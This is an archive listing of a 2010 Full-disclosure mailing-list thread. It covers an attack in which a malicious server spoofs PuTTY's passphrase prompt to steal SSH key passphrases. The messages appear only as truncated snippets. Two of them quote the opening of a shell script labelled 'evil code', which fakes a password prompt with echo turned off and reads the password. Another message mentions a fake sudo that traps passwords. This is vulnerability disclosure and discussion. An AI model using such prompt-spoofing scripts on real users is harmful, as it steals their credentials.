Re: [Full-disclosure] PuTTY private key passphrase stealing attack

2010-06-03 Thread Jan Schejbal
Am 02.06.2010 21:41, schrieb Joachim Schipper: But note that someone with access to a single account could use this to gain the password for that account, and hence possibly sudo access. The attack, as suggested by me, is about passphrases for private keys that should never get transmitted to

Re: [Full-disclosure] PuTTY private key passphrase stealing attack

2010-06-02 Thread rapper crazy
all controls like MOTD can be bypassed ... =edited script= # evil code mIP=`/sbin/ifconfig | grep x.x.x | cut -d ':' -f2- | cut -d ' ' -f1` mUn=`whoami` mSttyVal=`stty -g` echo -en Permission denied, please try again.\n echo -en $...@$mip's password: stty -echo read password echo -en

Re: [Full-disclosure] PuTTY private key passphrase stealing attack

2010-06-02 Thread Joachim Schipper
On Wed, Jun 02, 2010 at 01:29:40PM +0530, rapper crazy wrote: all controls like MOTD can be bypassed ... =edited script= # evil code mIP=`/sbin/ifconfig | grep x.x.x | cut -d ':' -f2- | cut -d ' ' -f1` mUn=`whoami` mSttyVal=`stty -g` echo -en Permission denied, please try

Re: [Full-disclosure] PuTTY private key passphrase stealing attack

2010-06-02 Thread paul . szabo
... someone with access to a single account could use this to gain the password for that account, and hence possibly sudo access. Oh yes, someone with access to an account has... access to that. If he wanted sudo, then just have a fake sudo: one that traps the password and runs the real sudo

Re: [Full-disclosure] PuTTY private key passphrase stealing attack

2010-06-02 Thread Marsh Ray
On 6/2/2010 2:58 PM, paul.sz...@sydney.edu.au wrote: ... someone with access to a single account could use this to gain the password for that account, and hence possibly sudo access. Oh yes, someone with access to an account has... access to that. If he wanted sudo, then just have a fake

Re: [Full-disclosure] PuTTY private key passphrase stealing attack

2010-06-01 Thread halfdog
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Jan Schejbal wrote: PuTTY, a SSH client for Windows, requests the passphrase to the ssh key in the console window used for the connection. This could allow a malicious server to gain access to a user's passphrase by spoofing that prompt That

Re: [Full-disclosure] PuTTY private key passphrase stealing attack

2010-06-01 Thread Benji
You should make a show about it. On Tue, Jun 1, 2010 at 6:07 AM, Rob Fuller jd.mu...@gmail.com wrote: Couldn't this also be thwarted by having a MOTD? It generally displays before the bashrc if I'm not mistaken. -- Rob Fuller | Mubix Room362.com | Hak5.org On Mon, May 31, 2010 at 8:47

Re: [Full-disclosure] PuTTY private key passphrase stealing attack

2010-06-01 Thread Borja Marcos
On Jun 1, 2010, at 2:47 AM, Jan Schejbal wrote: PuTTY, a SSH client for Windows, requests the passphrase to the ssh key in the console window used for the connection. This could allow a malicious server to gain access to a user's passphrase by spoofing that prompt. We assume that the

[Full-disclosure] PuTTY private key passphrase stealing attack

2010-05-31 Thread Jan Schejbal
PuTTY, a SSH client for Windows, requests the passphrase to the ssh key in the console window used for the connection. This could allow a malicious server to gain access to a user's passphrase by spoofing that prompt. We assume that the user is using key-bases ssh auth with ssh and connects

Re: [Full-disclosure] PuTTY private key passphrase stealing attack

2010-05-31 Thread Rob Fuller
Couldn't this also be thwarted by having a MOTD? It generally displays before the bashrc if I'm not mistaken. -- Rob Fuller | Mubix Room362.com | Hak5.org On Mon, May 31, 2010 at 8:47 PM, Jan Schejbal jan.mailinglis...@googlemail.com wrote: PuTTY, a SSH client for Windows, requests the